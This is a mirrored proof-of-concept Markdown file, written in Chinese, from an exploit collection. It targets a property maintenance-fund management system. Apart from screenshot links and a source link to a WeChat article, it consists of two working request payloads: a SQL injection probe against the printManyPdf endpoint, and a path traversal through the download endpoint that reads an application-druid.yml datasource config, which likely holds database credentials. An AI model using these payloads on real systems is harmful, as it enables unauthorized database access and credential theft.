mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
24 lines
714 B
Markdown
24 lines
714 B
Markdown
|
|
## 物业专项维修资金管理系统漏洞
|
||
|
|
利用条件:所有漏洞均需要普通用户权限
|
||
|
|
|
||
|
|
## sql注入漏洞
|
||
|
|
```
|
||
|
|
/property/propertyRightAlteration/printManyPdf?id=1+and+1=1a
|
||
|
|
```
|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|
|
||
|
|
## 文件读取漏洞
|
||
|
|
```
|
||
|
|
/common/download?fileName=../../wxzj/application-druid.yml
|
||
|
|
```
|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|
|
||
|
|
## 漏洞来源
|
||
|
|
- https://mp.weixin.qq.com/s/wNCafw5pBGTnUEVUoDjbtg
|